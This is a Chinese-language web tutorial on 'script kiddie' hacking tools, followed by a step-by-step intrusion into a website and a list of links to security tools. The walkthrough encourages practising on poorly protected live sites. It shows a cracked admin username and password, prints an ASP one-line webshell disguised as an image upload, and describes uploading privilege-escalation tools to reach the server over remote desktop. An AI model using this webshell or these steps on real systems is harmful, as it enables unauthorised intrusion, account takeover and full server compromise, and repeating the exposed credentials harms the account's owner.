• 懒鸟飞:精品网站源码、帝国cms模板专业分享平台

脚本小子常用工具和渗透实战案例

脚本小子(script kiddie)是一个贬义词,用来描述:以“黑客”自居并沾沾自喜的初学者。脚本小子不像真正的黑客那样发现系统漏洞,他们通常使用别人开发的程序来恶意破坏他人系统。通常的刻板印象为一位没有专科经验的少年,破坏无辜网站企图使得他的朋友感到惊讶。因而称之为脚本小子。他们常常从某些网站上复制脚本代码,然后到处粘贴,却并不一定明白他们的方法与原理。他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好,但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正的黑客来说是必须具备的素质。但是需要看自己怎么理解,自己的价值观是怎么样的,拿技术去做一些什么样的事情,成为什么样的人,愿望和初心是好的,做点有意义的事情。

1、找注入 爆账号

啊D和明小子

 

2、注入工具

椰树扫描、流光、Pangolin(穿山甲)、havij(胡萝卜)

 

3、找后台

御剑后台扫描、wwwscan扫描器

 

4、传小马

各种一句话木马、中国菜刀、中国蚁剑

 

5、提权

pr提权工具、黑协提权工具

 

接下来就直接渗透一个网站案例,来演示各种工具的使用方法:
实验环境大家可以用虚拟机或者本地进行模拟操作,或者找些漏洞较多,比较垃圾的网站进行操作。

 

演示开始:

 

 

步骤一:找注入

 

打开浏览器,推荐用火狐浏览器或谷歌浏览器。

出现下图的页面,这里用ie演示。

1.png 

 

 

IE浏览器的选项设置,新手建议全部显示反馈的错误信息,根据实际情况来,就可以准确的判断网页的信息。

 

直接用啊D注入工具和明小子配合检测使用

2.png 

3.png 

 

成功找到注入点,如下图:

4.png 

 

步骤二:爆账号

右键找到的注入点——注入检测

5.png 

点击右上角的检测开始注入检测

6.png 

 

7.png 

8.png 

 

最后得到网站的某个账号,用户名:linhai ,密码:d7e15730ef9708c0

 

一般来说,数据库存放的密码应该是经过md5加密过的,不用担心,只需要用解密MD5工具一下就可以解密,百度一下,解密工具很多,这里推荐:http://www.dmd5.com

 

解密md5后得到的密码为:linhai19760812

 

 

 

步骤三:找后台

此步骤为找到网站的管理后台。

9.png 

扫描工具,wwwscan_gui打开后开始扫描。

10.png 

接下来,访问扫描到的后台地址,登录。

地址:/admin/login.asp

11.png 

直接登录网站后台,到这里,已经成功获得网站后台管理权限了。

 

 

步骤四:传小马

 

记住黑客入门教程里面的一句话,先传小马,再传大马,找到上传点就不会错,稳拿下。

由于是asp的站点,确定需要的是asp一句话木马,代码为<%eval request("x")%>,密码为x

 

网站后台的上传点可能很多,有的可行,有的不行,可以多试试,我们的目的就是通过这些上传点,我们的木马上传到网站服务器,从而控制网站。

 

通常成功率比较高的上传点是上传图片附件,如下图:

12.png 

做个木马,打开txt文档,写上asp一句话<%eval request("x")%>,密码是x。并且把文件类型改成图片,不要

 

只写一行代码,不大不小,100行差不多。

13.png 

然后上传。接下来的思路就是利用网站的数据库功能,把我们上传的文件后缀由jpg改成asp

14.png 

然后,就可以用菜刀,连接刚才复制到根目录的xbk.asp文件(木马)。

 

打开菜刀,在空白处右键——添加,输入木马的地址和网站。

15.png 

16.png 

 

步骤五:拿权限

接下来主要用提权三件套:cmd.exepr.exe3389.bat ,把这3个工具,用菜刀上传到回收站目录下面。

 

接下来,进入我们上传的cmd.exe虚拟终端,执行我们的提权三件套。

17.png 

18.png 

不仅仅这种方法可以成功,不同的思路可以转变,或许过程会很顺利,也或者防护很多,没办法顺利入侵成功。

执行完成后,打开远程桌面用刚才提权的账号,进入服务器。

19.png 

到此为止,一个完整的渗透过程结束,已经成功获得服务器的管理权限了。

彩蛋来咯!接下来分享些工具。

Metasploit

——应用最广的渗透测试软件

传送门

https://www.metasploit.com/

ArchStrike

——Arch Linux安全专业人员和狂热者的知识库

传送门

https://archstrike.org/

Parrot

——类似于kali的一款渗透测试操作系统

传送门

https://www.parrotsec.org/

漏洞扫描器

Netsparker

——Web应用安全扫描器

传送门

https://www.netsparker.com/

Nexpose

——漏洞管理&风险控制软件

传送门

https://www.rapid7.com/products/nexpose/

Nessus

——漏洞,配置,和合规检测

传送门

http://www.tenable.com/products/nessus-vulnerability-scanner

Nikto

——Web应用的漏洞扫描

传送门

https://cirt.net/nikto2

OpenVAS

——开源漏洞扫描器

传送门

http://www.openvas.org/

OWASP Zed Attack Proxy

——web应用的渗透测试工具

传送门

https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

w3af

——Web应用工具和审计框架

传送门

https://github.com/andresriancho/w3af

Wapiti

——Web应用漏洞

传送门

http://wapiti.sourceforge.net/

WebReaver

——苹果系统下的Web应用漏洞扫描器

传送门

http://www.webreaver.com/

DVCS Ripper

——SVN/GIT/HG/BZR等版本控制系统扫描器

传送门

https://github.com/kost/dvcs-ripper

arachni

——Web应用安全扫描框架

传送门

https://github.com/Arachni/arachni

SQLmap

——SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)

传送门

http://sqlmap.org/

SQLiScanner

——一款基于SQLMAPCharles的被动SQL注入漏洞扫描工具

传送门

https://github.com/0xbug/SQLiScanner

DSSS

——99行代码实现的sql注入漏洞扫描器

传送门

https://github.com/stamparm/DSSS

Feigong

——针对各种情况自由变化的MySQL注入脚本

传送门

https://github.com/LoRexxar/Feigong

网络工具

nmap

——免费的安全扫描器,用于网络勘测和安全审计

传送门

https://nmap.org/

tcpdump/libpcap

——一种常见的命令行数据包分析工具

传送门

http://www.tcpdump.org/

 

 
QQ在线咨询
QQ客服
淘宝官网